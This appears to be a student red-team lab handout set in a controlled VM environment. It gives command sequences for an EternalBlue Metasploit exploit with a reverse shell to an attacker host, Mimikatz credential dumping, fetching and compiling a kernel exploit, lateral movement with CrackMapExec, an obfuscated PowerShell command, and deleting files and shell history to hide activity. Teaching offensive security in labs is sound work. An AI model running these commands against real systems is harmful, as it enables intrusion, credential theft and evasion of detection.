Red Team Simulation & Adversarial Tactics Lab
Overview
This lab focuses on offensive security techniques used by adversaries to compromise systems, escalate privileges, and move laterally in a network. Students will use real-world tools to simulate cyberattacks in a controlled environment.
Lab Instructions
1. Setting Up Your Red Team Environment
You will need:
- A Kali Linux VM (or Parrot Security OS)
- A Windows Attack Target (Windows 10/11 VM or Active Directory lab)
- Preinstalled tools:
Metasploit
,BloodHound
,Sliver
,CrackMapExec
2. Gaining Initial Access
Step 1: Exploit a Remote Service (Metasploit)
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [target_ip]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [attacker_ip]
exploit
๐ Proof of Completion: Take a screenshot of a successful session.
Step 2: Credential Dumping with Mimikatz
mimikatz
privilege::debug
sekurlsa::logonpasswords
๐ Proof of Completion: Extract a set of credentials from the target machine.
3. Privilege Escalation
Step 1: Check for Misconfigurations
whoami /priv
wmic qfe list brief | findstr "KB" # Look for missing patches
Step 2: Exploit a Kernel Vulnerability
wget https://exploit-db.com/some_kernel_exploit.c -O exploit.c
gcc exploit.c -o exploit
./exploit
๐ Proof of Completion: Capture proof of administrator/system privileges.
4. Lateral Movement
Step 1: Enumerate Network Shares
smbclient -L \\[target_ip] -U user
net use Z: \\[target_ip]\C$ /user:admin password
๐ Proof of Completion: Map a network share.
Step 2: Move Laterally Using CrackMapExec
crackmapexec smb [target_subnet] -u user -p password --exec "whoami"
๐ Proof of Completion: Show lateral movement to another machine.
5. Evading Detection
Step 1: Obfuscate PowerShell Scripts
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("powershell -c Invoke-Mimikatz"))
write-output $encoded
๐ Proof of Completion: Show your obfuscated PowerShell command.
Step 2: Hide Your Tracks
Remove-Item -Path "C:\Windows\Temp\malware.exe" -Force
echo "" > ~/.bash_history
๐ Proof of Completion: Show a clean command history.
Final Submission
- Submit a Google Doc with:
- Screenshots of each phase (initial access, privilege escalation, lateral movement, and evasion).
- A short write-up explaining each step.
- Ensure all steps are properly documented.
๐ Congratulations! You’ve completed the Red Team Simulation & Adversarial Tactics Lab! ๐